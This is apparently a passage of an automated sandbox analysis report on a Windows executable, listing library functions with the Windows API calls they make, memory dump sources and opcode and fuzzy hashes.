                                                                                                                                                                          • Opcode ID: 98326534d8ff861684aec470495c36b64cebcc9c3b07522a18e67cb76c2f7903
                                                                                                                                                                          • Instruction ID: 7e1da21bce3b158b14bd673ef3d339f94e7989879422c1a9fefdb32f174533b2
                                                                                                                                                                          • Opcode Fuzzy Hash: 98326534d8ff861684aec470495c36b64cebcc9c3b07522a18e67cb76c2f7903
                                                                                                                                                                          • Instruction Fuzzy Hash: A501963170021537D6503AB3AD09E9F2B5EDFD67AAB00083AF909D1282EA68D540C7BD
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00438F04, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00438F0E
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00438F66
                                                                                                                                                                          • GetFileSize.KERNEL32(?,?,00000088,00438B51,00000000,0000000C,00438CFA,?,?,?,?,?,?,00000000), ref: 00438F6F
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00438F7C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorException@8FileH_prolog3_LastSizeThrow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4197087271-0
                                                                                                                                                                          • Opcode ID: c2b057fb842b6e7164f9f8edb5e6690897ce99b71b35cc9447a41f87a1caf095
                                                                                                                                                                          • Instruction ID: 7d077d61ac914cbb7f6f875a3ca4463cf845ed2ba384b32b6ba200ac6798d57f
                                                                                                                                                                          • Opcode Fuzzy Hash: c2b057fb842b6e7164f9f8edb5e6690897ce99b71b35cc9447a41f87a1caf095
                                                                                                                                                                          • Instruction Fuzzy Hash: DE118C71900214AFD700EF60C881E9EB375BB08314F40426EF616A71D1DFB49E44CB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004038A0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(CC858012,?,?,?,?,00471888,000000FF,HsG,004043F6,?,00000001,000000FF), ref: 004038DE
                                                                                                                                                                          • SetLastError.KERNEL32(00477348,00000000,?,00000000), ref: 0040393A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 1452528299-815662401
                                                                                                                                                                          • Opcode ID: 5a2b26817d39772b000c05083c4b029144a3f0383ee2d35cfaf974a983ab40f5
                                                                                                                                                                          • Instruction ID: a055bc4fbca92020e3c4f53dfec63bd2502774e623b839e0969b71d0bacaea21
                                                                                                                                                                          • Opcode Fuzzy Hash: 5a2b26817d39772b000c05083c4b029144a3f0383ee2d35cfaf974a983ab40f5
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F115B76500744EFD710CF55C904B56BBF8FF49718F20866EE81A87790D77AA505CB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004409F9, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00440A8F,?,?,0043FBA1,?,?,0043F6D9,?,?,0043829B,004A43E0), ref: 00440A13
                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00440A8F,?,?,0043FBA1,?,?,0043F6D9,?,?,0043829B,004A43E0), ref: 00440A37
                                                                                                                                                                          • CharNextW.USER32(00000000,?,?,00000000,?,00440A8F,?,?,0043FBA1,?,?,0043F6D9,?,?,0043829B,004A43E0), ref: 00440A40
                                                                                                                                                                          • CharNextW.USER32(00000000,?,?,00000000,?,00440A8F,?,?,0043FBA1,?,?,0043F6D9,?,?,0043829B,004A43E0), ref: 00440A45
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3213498283-0
                                                                                                                                                                          • Opcode ID: cf6b5b185759369791b1d8c4c9b439f74e36ada1be288b58f39c8029f8ff8bf1
                                                                                                                                                                          • Instruction ID: b80da12b4a0e4f81402496560a4c4555225ebb9c96c1df133f49eee0145fdd2c
                                                                                                                                                                          • Opcode Fuzzy Hash: cf6b5b185759369791b1d8c4c9b439f74e36ada1be288b58f39c8029f8ff8bf1
                                                                                                                                                                          • Instruction Fuzzy Hash: B6F0C82251036459FA317BB05C4083BB3A8FB727597114827E340FB250E278CDD197AD
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00449BC8, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                          • Instruction ID: 127c8480397d044ac6829e0414e52cd9b65ba8e748966d8ce241c49f842cd720
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                          • Instruction Fuzzy Hash: 53017E3604014EFBDF265E84DC428EE3F62BB18355F48841AFA1858135C63BC9B1BB8A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042F52F, Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0042F54A
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0042F55C
                                                                                                                                                                            • Part of subcall function 0042FBDD: __EH_prolog3_GS.LIBCMT ref: 0042FBE4
                                                                                                                                                                            • Part of subcall function 0042FBDD: SendMessageW.USER32(?,0000101E,00000000,000000FE), ref: 0042FCBA
                                                                                                                                                                            • Part of subcall function 0042FBDD: SendMessageW.USER32(?,00001036,00000000,00000020), ref: 0042FCD3
                                                                                                                                                                            • Part of subcall function 0042FBDD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FCE1
                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 0042F57A
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0042F595
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Item$EnableH_prolog3_Window
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3504422573-0
                                                                                                                                                                          • Opcode ID: 0a3c5a5a0a59c89dd72fa079db85e7a91ef229f9c5d13d31bbbe801adf856be9
                                                                                                                                                                          • Instruction ID: 7af920907cf75599411dfd37cbc1abea00089cd779bcf9964f2af7a58eb5325f
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a3c5a5a0a59c89dd72fa079db85e7a91ef229f9c5d13d31bbbe801adf856be9
                                                                                                                                                                          • Instruction Fuzzy Hash: C001A231741229BFCB214F61AC499AF7F79EB0A7A0B804036F94587211C6759A94EBA8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004479C7, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Interlocked$DecrementIncrement__lock_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3814665652-0
                                                                                                                                                                          • Opcode ID: 740091e77bd3fe98d8a03a273557952def80354f39e4a6962ff475459b24de57
                                                                                                                                                                          • Instruction ID: 4b50c739f31fcbcdf9171da800009731871fe61d78232dffbc8b586124af7cc4
                                                                                                                                                                          • Opcode Fuzzy Hash: 740091e77bd3fe98d8a03a273557952def80354f39e4a6962ff475459b24de57
                                                                                                                                                                          • Instruction Fuzzy Hash: CC01E131D04A21ABFB21AF25944271E7720BF40729F05006BE80477791CB3C6E82CBCD
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043892B, Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00438935
                                                                                                                                                                          • InterlockedDecrement.KERNEL32(00000000), ref: 00438945
                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0043896D
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 004389A6
                                                                                                                                                                            • Part of subcall function 004389BD: InterlockedDecrement.KERNEL32(004A679C), ref: 004389E2
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DecrementInterlocked$CloseException@8H_prolog3_HandleThrow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 104201321-0
                                                                                                                                                                          • Opcode ID: 1146978f61a288e9bf9c6f16eacc1cda4f8fcbae070e030f4969959e002e9d5e
                                                                                                                                                                          • Instruction ID: 80cd12010bae93d264f543be06dac394872004ece6b422a5d7dc48b3de30585e
                                                                                                                                                                          • Opcode Fuzzy Hash: 1146978f61a288e9bf9c6f16eacc1cda4f8fcbae070e030f4969959e002e9d5e
                                                                                                                                                                          • Instruction Fuzzy Hash: B101C0705107018FDB34EB62CC45BAAB3B4BF04B25F50952EF056928E1DFBCA940CB0A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040D147, Relevance: 6.0, APIs: 4, Instructions: 42windowtimeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostMessageW.USER32(?,00000002,00000000,00000000), ref: 0040D18C
                                                                                                                                                                          • KillTimer.USER32(?,000005DC), ref: 0040D1A3
                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 0040D1AB
                                                                                                                                                                          • SetTimer.USER32(?,000005DC,000003E8,00000000), ref: 0040D1CC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostTimer$KillQuit
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 143517078-0
                                                                                                                                                                          • Opcode ID: e3890373df0c81f7f32e421c30ebba9c482c94304c5d5f5f92d456d141b17648
                                                                                                                                                                          • Instruction ID: 03b4fae5a5745b9908b0e41a5aed76128b778eb5b1245b2dd786e1f4817b0b32
                                                                                                                                                                          • Opcode Fuzzy Hash: e3890373df0c81f7f32e421c30ebba9c482c94304c5d5f5f92d456d141b17648
                                                                                                                                                                          • Instruction Fuzzy Hash: 97012130644B08EBE7105FA0EC49B163B61A714701F004033FA59EE2E0CB7599ACCF1D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041E398, Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1266772231-0
                                                                                                                                                                          • Opcode ID: 92b125542a93b909144426065fba856daa8477dbf69630a7d6309643aaf921cf
                                                                                                                                                                          • Instruction ID: f7f8115306584c0f02e3d5fca89c2ecad0d5501f9cbf5066a1672ce2d1309927
                                                                                                                                                                          • Opcode Fuzzy Hash: 92b125542a93b909144426065fba856daa8477dbf69630a7d6309643aaf921cf
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A011D34A0024D9FDB10DBA6DC4AFAA7BE9AB00744F458076E915D72A1D7A8D485CB1C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042FD04, Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0042FD23
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000100C,000000FF,00000002), ref: 0042FD35
                                                                                                                                                                          • _memset.LIBCMT ref: 0042FD4A
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000104B,00000000,?), ref: 0042FD68
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Item_memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 105786929-0
                                                                                                                                                                          • Opcode ID: 901cd1dec661f225d1f724e7e27ba8d42aae90a8f2bc24a258625009515dba08
                                                                                                                                                                          • Instruction ID: 20c144d96375a6b2159e36d131d06b6733b299d5b1de588e6942118d01a32f13
                                                                                                                                                                          • Opcode Fuzzy Hash: 901cd1dec661f225d1f724e7e27ba8d42aae90a8f2bc24a258625009515dba08
                                                                                                                                                                          • Instruction Fuzzy Hash: 9D01DBB1901714BFDB10EFA8EC45F9E3BB9AB04364F204232F614E61D0E7B059448B58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043F766, Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043F785
                                                                                                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 0043F792
                                                                                                                                                                            • Part of subcall function 0043FC89: GetLocaleInfoW.KERNEL32(?,00001004,?,00000014), ref: 0043FCBB
                                                                                                                                                                            • Part of subcall function 0043FC89: TranslateCharsetInfo.GDI32(00000000,?,00000002), ref: 0043FCD6
                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0043F7A8
                                                                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000000), ref: 0043F7B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InfoMessageSend$CharsetCreateFontIndirectLocaleObjectTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2681337867-0
                                                                                                                                                                          • Opcode ID: b9663d79c59867c1305a4d0b104489302cd92a26486f6049de976b04162c7b0f
                                                                                                                                                                          • Instruction ID: fee66e2e94e828df20c375268f4f2092bc0ee72af2013b51b0ad76cc78cec9ae
                                                                                                                                                                          • Opcode Fuzzy Hash: b9663d79c59867c1305a4d0b104489302cd92a26486f6049de976b04162c7b0f
                                                                                                                                                                          • Instruction Fuzzy Hash: F4F03171640308BFEB10AFA5DC4AFAEB7BEBB18704F100429B605A7191CA70A5448B68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041E409, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsWindow.USER32 ref: 0041E412
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0041E42F
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 0041E447
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000402,?,00000000), ref: 0041E460
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$ItemWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 591194657-0
                                                                                                                                                                          • Opcode ID: 98dccb3494a0f0593dd563cc377b8509c2e120746dfdea32ab5164981f51bdf0
                                                                                                                                                                          • Instruction ID: 7b7696ef85170225a5facdb99ff1d9fcb28c25c62f0468cc9c07da5ac8cfdf1e
                                                                                                                                                                          • Opcode Fuzzy Hash: 98dccb3494a0f0593dd563cc377b8509c2e120746dfdea32ab5164981f51bdf0
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF0A7753002287FE6002717EC85DBB7B5DDF41359B014036FB09E6561D6695C454A7D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

